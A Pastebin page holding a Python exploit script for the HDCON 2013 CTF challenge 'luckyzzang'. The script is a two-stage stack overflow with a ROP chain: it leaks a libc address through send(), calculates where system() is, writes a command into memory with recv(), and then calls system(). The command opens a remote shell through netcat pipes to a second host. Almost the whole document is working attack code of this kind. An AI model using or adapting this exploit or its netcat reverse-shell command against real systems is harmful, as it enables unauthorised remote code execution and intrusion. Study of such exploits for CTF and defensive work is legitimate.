Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # /usr/bin/python
- #
- # HDCON 2013 PreQual Lv5 - exploitation, luckyzzang
- # by sweetchip
- # 2013.11.24 (stage version)
- from socket import *
- import struct
- import time
- p = lambda x : struct.pack("<L", x)
- up = lambda x : struct.unpack("<L", x)
- ip = "192.168.32.225"
- port = 7777
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((ip, port))
- print s.recv(1024) # msg
- func_main = 0x080486d4
- rand = 0x0804a030
- send = 0x08048610
- recv = 0x080485f0
- libc = 0xb75b5000
- ppppr = 0x080489cc
- freespace = 0x0804a054
- system = 0
- cmd = "nc 192.168.32.43 9090 | /bin/sh |nc 192.168.32.43 9091;"
- ##################################################
- # Stage 1 - Get system addr
- ##################################################
- payload = "A"*0x408 # buf
- payload += "SWCP" # sfp
- ##################################################
- payload += p(send) # send <-- RET HERE!
- payload += p(ppppr)
- payload += p(4)
- payload += p(rand) # rand
- payload += p(4)
- payload += p(0)
- ##################################################
- payload += p(func_main)
- payload += "AAAA"
- payload += p(4)
- ##################################################
- s.send(payload) # send
- temp = s.recv(4) # get rand ptr
- ##################################################
- ##################################################
- # calc system addr
- ##################################################
- temp = up(temp)[0]
- # offset here!
- temp -= 0x34470 # rand - base_to_rand
- temp += 0x41280 # base + base_to_system
- system = temp
- print "system addr : " + hex(system)
- ##################################################
- ##################################################
- # Stage 2 - exploit
- ##################################################
- payload = ""
- payload += "A" * 0x408
- payload += "SWCP"
- ##################################################
- payload += p(recv) # recv
- payload += p(ppppr)
- payload += p(4)
- payload += p(freespace)
- payload += p(len(cmd))
- payload += p(0)
- ##################################################
- payload += p(system) # system
- payload += "SWCP"
- payload += p(freespace) # cmd
- ##################################################
- print s.recv(1024) # msg
- s.send(payload) # sending payload
- time.sleep(0.3)
- s.send(cmd) # send command
- print "Sending Payload . . ."
- raw_input("GOT SHELL?")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement